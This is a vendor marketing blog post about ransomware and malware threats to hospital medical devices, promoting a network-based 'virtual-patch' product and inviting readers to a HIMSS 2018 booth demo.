Increasingly threats will become sophisticated and automated smart enough to find the key vulnerabilities in a network. Remediation should likewise follow suit and will need to be more sophisticated and automated while leveraging machine learning and AI. The goal of this intelligent system is to deal proactively with any type of vulnerability and limit the damage before it occurs, protecting the hospital’s important business critical assets and closing the door on cyber vulnerabilities.
Hospitals see patients with viral infections on a regular basis. Most of the time, however, doctors can only treat the symptomsof the virus, and not the virus itself – that’s a job for the patient’s immune system to handle.
Similar to biological viruses, computer viruses that infect medical devices often cannot be treated directly. Once a virus creeps into the hospital system, it’s up to the system itself to fight it off. Due to the outdated nature of many of these healthcare devices, these exploits or infections are often catastrophic – causing healthcare IT and clinical/bio-meds departments to lose millions of dollars annually and putting patient care in jeopardy.
Below, we have listed a few common questions we’ve heard from our customers about the plague that is currently sweeping through healthcare IT.
Why is this even happening?
Let’s say your credit card gets stolen. You can call your bank, request a new credit card, and get whatever loss you sustained refunded, all within the same day.
If your healthcare records are stolen, you can’t deal with it as easily. A person’s health record contains highly private and sensitive information that provides a lifetime of opportunity for target exploitation. Healthcare records are up to 10 times as valuable as credit card records, making them a juicy target for opportunistic hackers.
Why can’t we sit back and let it run its course?
Every single day there are press articles on how WannaCry devastated a hospital, or a new ransomware caused operational disruption resulted in hospital rerouting ambulances to the nearby hospitals. The symptoms of these viruses can result in the loss of millions to the healthcare industry, and be causing widespread confusion and slow down of processes in areas where quick thinking and careful treatment is necessary.
Why can’t we make our IT immune system stronger?
To bolster the “immune system” in hospital systems, IT professionals can upgrade and patch vulnerable systems and fend off the attacks and give these devices better protection. However, upgrading and patching are incredibly difficult.
Unlike the auto-upgrades you may see on your laptop, medical device upgrades require a lot more individual attention. Manufacturers have a hard time rolling out patches for millions of units in the field because medical devices are embedded systems with a multitude of software components with potential security vulnerabilities and also have to go through an usually long FDA approval process.
Bringing equipment back to its original operating condition and guaranteeing that it is ready for patient usage is an arduous, expensive, and time-consuming process that has no guarantee of actually working. Protecting precious medical devices is a never-ending race. They will always lag behind the computer industry for a good reason and be always vulnerable to hacking if left unattended.
Why can’t we go into full quarantine?
We live in a connected world where each and every device needs to record and report vital patient data to the healthcare management system without manual intervention. Hospitals rely on cloud-based offerings, from enhanced radiology services to thermostats that monitor and preserve medical specimens stored in freezers.
In addition, because of the high costs of equipment, many hospitals lease or rent on a regular basis. Even the people employed by a hospital are often hired contractually, and hospitals have countless visitors that cannot be screened.
With remote clinic or telemedicine-based delivery, and countless mergers and acquisitions, healthcare IT staff are always challenged to offer the best patient care.
The Vaccine or Preventive Cure:
The recommendation from the manufacturing community calls for
a) segregating network access (segmentation)
b) block internet connectivity
c) go back to standalone mode.
This is no different than what NIST recommends, or HIPAA imposes on hospitals.
We at Ordr are trying to help on all the recommendation here on this issue. We call our technology a “virtual-patch”. A virtual-patch provides compensating controls for the medical devices by simply programming the installed base of switches, routers, and wireless access points to
a) reduce the exposure of devices spreading malware inside the corporate IT networks
b) to control the type and amount of external traffic from/to this medical devices and
c) protect the precious medical devices in real time as soon as an issue arises.
Even better, as the word goes “prevention is better than cure” Ordr allows IT to put preemptive controls that prevent malware and ransomware gaining control of these medical devices.
It all starts with simple diligent everyday hygiene. Having accurate inventory and visibility on what is connecting to the network day in and day out is the key. Continuously monitoring for malware exposure or vulnerability exploits and apply preventive measures is an absolute must. Watching internet communication and restricting it to a narrow set is even more critical.
Please stop by our booth atHIMSS 2018 to get a demo of our product that could help you along this journey. Together, we can make a change in the current landscape, much desired and way overdue. Let us stop this hacking trend once and for all and we are excited to be part of this great mission.